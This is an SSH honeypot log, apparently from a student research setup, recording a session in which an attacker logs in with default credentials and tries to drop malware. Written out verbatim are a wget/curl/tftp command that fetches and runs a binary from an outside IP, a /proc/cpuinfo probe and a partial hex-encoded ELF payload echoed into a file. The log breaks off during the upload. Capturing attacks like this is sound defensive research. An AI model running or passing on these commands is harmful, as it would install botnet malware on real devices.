
(node:2741570) Warning: Accessing non-existent property 'padLevels' of module exports inside circular dependency
(Use `node --trace-warnings ...` to show where the warning was created)
Started with the following options:
{
  debug: true,
  mitmIp: '10.0.3.1',
  autoAccess: true,
  autoAccessCache: 5000,
  maxAttemptsPerConnection: 6,
  sshServerIdentifier: 'SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2',
  containerMountPathPrefix: '/var/lib/lxc',
  containerMountPathSuffix: 'rootfs/',
  loggingAttackerStreams: '/home/student/MITM/logs/session_streams',
  loggingAuthenticationAttempts: '/home/student/MITM/logs/authentication_attempts',
  loggingLogins: '/home/student/MITM/logs/logins',
  loggingKeystrokes: '/home/student/MITM/logs/keystrokes',
  containerName: 'DATABASE_2',
  containerIp: '10.0.3.230',
  mitmPort: 1001,
  autoAccessFixed: 1
}
2022-10-22 22:59:29.973 - [Info] MITM Version: 2
2022-10-22 22:59:29.974 - [Info] Auto Access Enabled: true
2022-10-22 22:59:29.975 - [Debug] [Init] Auto Access Theshold Achieved: false
2022-10-22 22:59:29.982 - [Info] SSH man-in-the-middle server for 10.0.3.230 listening on 10.0.3.1:1001
{"level":"error","message":"Forever detected script was killed by signal: SIGKILL"}
(node:2750959) Warning: Accessing non-existent property 'padLevels' of module exports inside circular dependency
(Use `node --trace-warnings ...` to show where the warning was created)
Started with the following options:
{
  debug: true,
  mitmIp: '10.0.3.1',
  autoAccess: true,
  autoAccessCache: 5000,
  maxAttemptsPerConnection: 6,
  sshServerIdentifier: 'SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2',
  containerMountPathPrefix: '/var/lib/lxc',
  containerMountPathSuffix: 'rootfs/',
  loggingAttackerStreams: '/home/student/MITM/logs/session_streams',
  loggingAuthenticationAttempts: '/home/student/MITM/logs/authentication_attempts',
  loggingLogins: '/home/student/MITM/logs/logins',
  loggingKeystrokes: '/home/student/MITM/logs/keystrokes',
  containerName: 'DATABASE_2',
  containerIp: '10.0.3.223',
  mitmPort: 1001,
  autoAccessFixed: 1
}
2022-10-22 23:00:29.739 - [Info] MITM Version: 2
2022-10-22 23:00:29.740 - [Info] Auto Access Enabled: true
2022-10-22 23:00:29.740 - [Debug] [Init] Auto Access Theshold Achieved: false
2022-10-22 23:00:29.747 - [Info] SSH man-in-the-middle server for 10.0.3.223 listening on 10.0.3.1:1001
2022-10-22 23:04:06.215 - [Debug] [Connection] Attacker connected: 185.196.220.81 | Client Identification: SSH-2.0-libssh2_1.9.0_DEV
2022-10-22 23:04:06.800 - [Debug] [Auth] Attacker 185.196.220.81 trying to authenticate with 'password'
2022-10-22 23:04:06.800 - [Debug] [Auto Access] Attacker: 185.196.220.81, Threshold: 1, Attempts: 1
2022-10-22 23:04:06.801 - [Debug] [Auto Access] Compromising the honeypot
2022-10-22 23:04:06.801 - [Debug] [Auto Access] Adding the following credentials: 'admin:admin'
2022-10-22 23:04:07.189 - [Debug] [Auto Access] Auto-access is now disabled for the remainder of this MITM server instance
2022-10-22 23:04:07.192 - [Debug] [Auth] Valid credentials - Password Authentication
2022-10-22 23:04:07.192 - [Debug] [LXC] Attempting to connect to the honeypot: 10.0.3.223
2022-10-22 23:04:07.247 - [Debug] [LXC-Auth] Attacker authenticated and is inside container
2022-10-22 23:04:07.690 - [Debug] [SHELL] Opened shell for attacker
2022-10-22 23:04:07.693 - [Debug] [LXC Streams] New Stream | Total Streams: 1
2022-10-22 23:04:07.910 - [Debug] [SHELL] Attacker Keystroke: enable[LF]
2022-10-22 23:04:07.913 - [Debug] [SHELL] line from reader: enable
2022-10-22 23:04:07.913 - [Debug] [SHELL] Keystroke buffer: 101,110,97,98,108,101,10
2022-10-22 23:04:07.998 - [Debug] [SHELL] Attacker Keystroke: system[LF]
2022-10-22 23:04:07.999 - [Debug] [SHELL] line from reader: system
2022-10-22 23:04:07.999 - [Debug] [SHELL] Keystroke buffer: 115,121,115,116,101,109,10
2022-10-22 23:04:08.000 - [Debug] [SHELL] Attacker Keystroke: shell[LF]
2022-10-22 23:04:08.003 - [Debug] [SHELL] line from reader: shell
2022-10-22 23:04:08.003 - [Debug] [SHELL] Keystroke buffer: 115,104,101,108,108,10
2022-10-22 23:04:08.003 - [Debug] [SHELL] Attacker Keystroke: sh[LF]
2022-10-22 23:04:08.004 - [Debug] [SHELL] line from reader: sh
2022-10-22 23:04:08.004 - [Debug] [SHELL] Keystroke buffer: 115,104,10
2022-10-22 23:04:08.004 - [Debug] [SHELL] Attacker Keystroke: linuxshell[LF]
2022-10-22 23:04:08.005 - [Debug] [SHELL] line from reader: linuxshell
2022-10-22 23:04:08.005 - [Debug] [SHELL] Keystroke buffer: 108,105,110,117,120,115,104,101,108,108,10
2022-10-22 23:04:08.005 - [Debug] [SHELL] Attacker Keystroke: cd[Space]/tmp/;[Space]echo[Space]"senpai"[Space]>[Space]rootsenpai;[Space]cat[Space]rootsenpai;[Space]rm[Space]-rf[Space]rootsenpai[LF]
2022-10-22 23:04:08.016 - [Debug] [SHELL] line from reader: cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai
2022-10-22 23:04:08.016 - [Debug] [SHELL] Keystroke buffer: 99,100,32,47,116,109,112,47,59,32,101,99,104,111,32,34,115,101,110,112,97,105,34,32,62,32,114,111,111,116,115,101,110,112,97,105,59,32,99,97,116,32,114,111,111,116,115,101,110,112,97,105,59,32,114,109,32,45,114,102,32,114,111,111,116,115,101,110,112,97,105,10
2022-10-22 23:04:08.226 - [Debug] [SHELL] Attacker Keystroke: rm[Space]-rf[Space]shr;[Space]wget[Space]http://46.23.109.47/shr[Space]||[Space]curl[Space]-O[Space]http://46.23.109.47/shr[Space]||[Space]tftp[Space]46.23.109.47[Space]-c[Space]get[Space]shr[Space]||[Space]tftp[Space]-g[Space]-r[Space]shr[Space]46.23.109.47;[Space]chmod[Space]777[Space]shr;./shr[Space]ssh;[Space]rm[Space]-rf[Space]shr[LF]
2022-10-22 23:04:08.240 - [Debug] [SHELL] line from reader: rm -rf shr; wget http://46.23.109.47/shr || curl -O http://46.23.109.47/shr || tftp 46.23.109.47 -c get shr || tftp -g -r shr 46.23.109.47; chmod 777 shr;./shr ssh; rm -rf shr
2022-10-22 23:04:08.241 - [Debug] [SHELL] Keystroke buffer: 114,109,32,45,114,102,32,115,104,114,59,32,119,103,101,116,32,104,116,116,112,58,47,47,52,54,46,50,51,46,49,48,57,46,52,55,47,115,104,114,32,124,124,32,99,117,114,108,32,45,79,32,104,116,116,112,58,47,47,52,54,46,50,51,46,49,48,57,46,52,55,47,115,104,114,32,124,124,32,116,102,116,112,32,52,54,46,50,51,46,49,48,57,46,52,55,32,45,99,32,103,101,116,32,115,104,114,32,124,124,32,116,102,116,112,32,45,103,32,45,114,32,115,104,114,32,52,54,46,50,51,46,49,48,57,46,52,55,59,32,99,104,109,111,100,32,55,55,55,32,115,104,114,59,46,47,115,104,114,32,115,115,104,59,32,114,109,32,45,114,102,32,115,104,114,10
2022-10-22 23:04:38.457 - [Debug] [SHELL] Attacker Keystroke: rm[Space]-rf[Space]gay;[Space]rm[Space]-rf[Space]mioriloli[LF]
2022-10-22 23:04:38.458 - [Debug] [SHELL] line from reader: rm -rf gay; rm -rf mioriloli
2022-10-22 23:04:38.458 - [Debug] [SHELL] Keystroke buffer: 114,109,32,45,114,102,32,103,97,121,59,32,114,109,32,45,114,102,32,109,105,111,114,105,108,111,108,105,10
2022-10-22 23:04:38.546 - [Debug] [SHELL] Attacker Keystroke: cat[Space]/proc/cpuinfo[Space]||[Space]while[Space]read[Space]i;[Space]do[Space]echo[Space]$i;[Space]done[Space]<[Space]/proc/cpuinfo[LF]
2022-10-22 23:04:38.547 - [Debug] [SHELL] line from reader: cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo
2022-10-22 23:04:38.548 - [Debug] [SHELL] Keystroke buffer: 99,97,116,32,47,112,114,111,99,47,99,112,117,105,110,102,111,32,124,124,32,119,104,105,108,101,32,114,101,97,100,32,105,59,32,100,111,32,101,99,104,111,32,36,105,59,32,100,111,110,101,32,60,32,47,112,114,111,99,47,99,112,117,105,110,102,111,10
2022-10-22 23:05:08.491 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x04\xc0\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.497 - [Debug] [SHELL] line from reader: echo -ne "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x04\xc0\x00\x00\x00" >> gay
2022-10-22 23:05:08.497 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,55,102,92,120,52,53,92,120,52,99,92,120,52,54,92,120,48,49,92,120,48,50,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,50,92,120,48,48,92,120,48,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,52,48,92,120,48,52,92,120,99,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.497 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x34\x00\x00\x06\xb8\x00\x00\x10\x07\x00\x34\x00\x20\x00\x03\x00\x28\x00\x07\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.503 - [Debug] [SHELL] line from reader: echo -ne "\x34\x00\x00\x06\xb8\x00\x00\x10\x07\x00\x34\x00\x20\x00\x03\x00\x28\x00\x07\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00" >> gay
2022-10-22 23:05:08.503 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,51,52,92,120,48,48,92,120,48,48,92,120,48,54,92,120,98,56,92,120,48,48,92,120,48,48,92,120,49,48,92,120,48,55,92,120,48,48,92,120,51,52,92,120,48,48,92,120,50,48,92,120,48,48,92,120,48,51,92,120,48,48,92,120,50,56,92,120,48,48,92,120,48,55,92,120,48,48,92,120,48,54,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,52,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.503 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x40\x00\x00\x00\x00\x06\x2c\x00\x00\x06\x2c\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x06\x30\x00\x44\x06"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.507 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x40\x00\x00\x00\x00\x06\x2c\x00\x00\x06\x2c\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x06\x30\x00\x44\x06" >> gay
2022-10-22 23:05:08.508 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,52,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,50,99,92,120,48,48,92,120,48,48,92,120,48,54,92,120,50,99,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,53,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,54,92,120,51,48,92,120,48,48,92,120,52,52,92,120,48,54,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.508 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x30\x00\x44\x06\x30\x00\x00\x00\x54\x00\x00\x00\x70\x00\x00\x00\x06\x00\x01\x00\x00\x64\x74\xe5\x51\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.516 - [Debug] [SHELL] line from reader: echo -ne "\x30\x00\x44\x06\x30\x00\x00\x00\x54\x00\x00\x00\x70\x00\x00\x00\x06\x00\x01\x00\x00\x64\x74\xe5\x51\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 23:05:08.516 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,51,48,92,120,48,48,92,120,52,52,92,120,48,54,92,120,51,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,55,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,54,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,54,52,92,120,55,52,92,120,101,53,92,120,53,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.516 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.524 - [Debug] [SHELL] line from reader: echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
2022-10-22 23:05:08.525 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,55,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.525 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x30\xa5\x00\xff\x00\x05\x2c\x00\x00\x04\x26\x00\x00\x85\x20\x25\x30\xc2\x00\xff\x30\xe7\x00\xff\x00\x87\x20\x25\x00\x02\x12"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.528 - [Debug] [SHELL] line from reader: echo -ne "\x00\x30\xa5\x00\xff\x00\x05\x2c\x00\x00\x04\x26\x00\x00\x85\x20\x25\x30\xc2\x00\xff\x30\xe7\x00\xff\x00\x87\x20\x25\x00\x02\x12" >> gay
2022-10-22 23:05:08.528 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,51,48,92,120,97,53,92,120,48,48,92,120,102,102,92,120,48,48,92,120,48,53,92,120,50,99,92,120,48,48,92,120,48,48,92,120,48,52,92,120,50,54,92,120,48,48,92,120,48,48,92,120,56,53,92,120,50,48,92,120,50,53,92,120,51,48,92,120,99,50,92,120,48,48,92,120,102,102,92,120,51,48,92,120,101,55,92,120,48,48,92,120,102,102,92,120,48,48,92,120,56,55,92,120,50,48,92,120,50,53,92,120,48,48,92,120,48,50,92,120,49,50,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.528 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x03\xe0\x00\x08\x00\x44\x10\x25\x3c\x1c\x00\x05\x27\x9c\x85\x58\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.532 - [Debug] [SHELL] line from reader: echo -ne "\x00\x03\xe0\x00\x08\x00\x44\x10\x25\x3c\x1c\x00\x05\x27\x9c\x85\x58\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00" >> gay
2022-10-22 23:05:08.532 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,48,48,92,120,52,52,92,120,49,48,92,120,50,53,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,53,92,120,53,56,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.532 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x08\x24\x04\x0f\xa1\x3c\x1c\x00\x05\x27\x9c\x85\x3c\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00\x08\x24\x04\x0f"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.537 - [Debug] [SHELL] line from reader: echo -ne "\x08\x24\x04\x0f\xa1\x3c\x1c\x00\x05\x27\x9c\x85\x3c\x03\x99\xe0\x21\x8f\x99\x80\x5c\x00\x80\x28\x21\x03\x20\x00\x08\x24\x04\x0f" >> gay
2022-10-22 23:05:08.537 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,92,120,97,49,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,53,92,120,51,99,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.538 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xa6\x3c\x1c\x00\x05\x27\x9c\x85\x20\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.542 - [Debug] [SHELL] line from reader: echo -ne "\xa6\x3c\x1c\x00\x05\x27\x9c\x85\x20\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30" >> gay
2022-10-22 23:05:08.542 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,97,54,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,53,92,120,50,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,48,48,92,120,97,48,92,120,49,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,99,48,92,120,51,56,92,120,50,49,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,48,92,120,52,48,92,120,51,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.542 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x21\x03\x20\x00\x08\x24\x04\x0f\xa5\x3c\x1c\x00\x05\x27\x9c\x84\xf8\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.553 - [Debug] [SHELL] line from reader: echo -ne "\x21\x03\x20\x00\x08\x24\x04\x0f\xa5\x3c\x1c\x00\x05\x27\x9c\x84\xf8\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00" >> gay
2022-10-22 23:05:08.553 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,92,120,97,53,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,102,56,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,50,55,92,120,98,100,92,120,102,102,92,120,100,48,92,120,97,102,92,120,98,102,92,120,48,48,92,120,50,56,92,120,97,102,92,120,98,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.553 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x8f\x99\x80\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.557 - [Debug] [SHELL] line from reader: echo -ne "\x10\x8f\x99\x80\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00" >> gay
2022-10-22 23:05:08.557 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,97,102,92,120,97,52,92,120,48,48,92,120,49,56,92,120,97,102,92,120,97,53,92,120,48,48,92,120,49,99,92,120,97,102,92,120,97,54,92,120,48,48,92,120,50,48,92,120,50,52,92,120,48,52,92,120,49,48,92,120,48,54,92,120,50,55,92,120,97,54,92,120,48,48,92,120,49,56,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,53,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.557 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x03\x8f\xbc\x00\x10\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\xac\x03\x99\xe0"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.576 - [Debug] [SHELL] line from reader: echo -ne "\x03\x8f\xbc\x00\x10\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\xac\x03\x99\xe0" >> gay
2022-10-22 23:05:08.576 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,51,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,98,102,92,120,48,48,92,120,50,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,50,55,92,120,98,100,92,120,48,48,92,120,51,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,97,99,92,120,48,51,92,120,57,57,92,120,101,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.576 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa4\x3c\x1c\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.582 - [Debug] [SHELL] line from reader: echo -ne "\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00\x08\x24\x04\x0f\xa4\x3c\x1c\x00" >> gay
2022-10-22 23:05:08.582 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,49,92,120,48,48,92,120,97,48,92,120,49,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,99,48,92,120,51,56,92,120,50,49,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,48,92,120,52,48,92,120,51,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,92,120,97,52,92,120,51,99,92,120,49,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.583 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x05\x27\x9c\x84\x84\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.585 - [Debug] [SHELL] line from reader: echo -ne "\x05\x27\x9c\x84\x84\x03\x99\xe0\x21\x00\xa0\x10\x21\x8f\x99\x80\x5c\x00\xc0\x38\x21\x00\x80\x28\x21\x00\x40\x30\x21\x03\x20\x00" >> gay
2022-10-22 23:05:08.585 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,56,52,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,48,48,92,120,97,48,92,120,49,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,99,92,120,48,48,92,120,99,48,92,120,51,56,92,120,50,49,92,120,48,48,92,120,56,48,92,120,50,56,92,120,50,49,92,120,48,48,92,120,52,48,92,120,51,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.585 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x08\x24\x04\x0f\xa3\x3c\x1c\x00\x05\x27\x9c\x84\x5c\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00\x10\x8f\x99\x80"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.592 - [Debug] [SHELL] line from reader: echo -ne "\x08\x24\x04\x0f\xa3\x3c\x1c\x00\x05\x27\x9c\x84\x5c\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbf\x00\x28\xaf\xbc\x00\x10\x8f\x99\x80" >> gay
2022-10-22 23:05:08.596 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,56,92,120,50,52,92,120,48,52,92,120,48,102,92,120,97,51,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,53,99,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,50,55,92,120,98,100,92,120,102,102,92,120,100,48,92,120,97,102,92,120,98,102,92,120,48,48,92,120,50,56,92,120,97,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,57,57,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.597 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00\x01\x8f\xbc\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.605 - [Debug] [SHELL] line from reader: echo -ne "\x5c\xaf\xa4\x00\x18\xaf\xa5\x00\x1c\xaf\xa6\x00\x20\x24\x04\x10\x06\x27\xa6\x00\x18\x03\x20\xf8\x09\x24\x05\x00\x01\x8f\xbc\x00" >> gay
2022-10-22 23:05:08.607 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,53,99,92,120,97,102,92,120,97,52,92,120,48,48,92,120,49,56,92,120,97,102,92,120,97,53,92,120,48,48,92,120,49,99,92,120,97,102,92,120,97,54,92,120,48,48,92,120,50,48,92,120,50,52,92,120,48,52,92,120,49,48,92,120,48,54,92,120,50,55,92,120,97,54,92,120,48,48,92,120,49,56,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,53,92,120,48,48,92,120,48,49,92,120,56,102,92,120,98,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.607 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\x10\x03\x99\xe0\x21\x27\xbd\xff"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.612 - [Debug] [SHELL] line from reader: echo -ne "\x10\x8f\xbf\x00\x28\x00\x00\x00\x00\x03\xe0\x00\x08\x27\xbd\x00\x30\x3c\x1c\x00\x05\x27\x9c\x84\x10\x03\x99\xe0\x21\x27\xbd\xff" >> gay
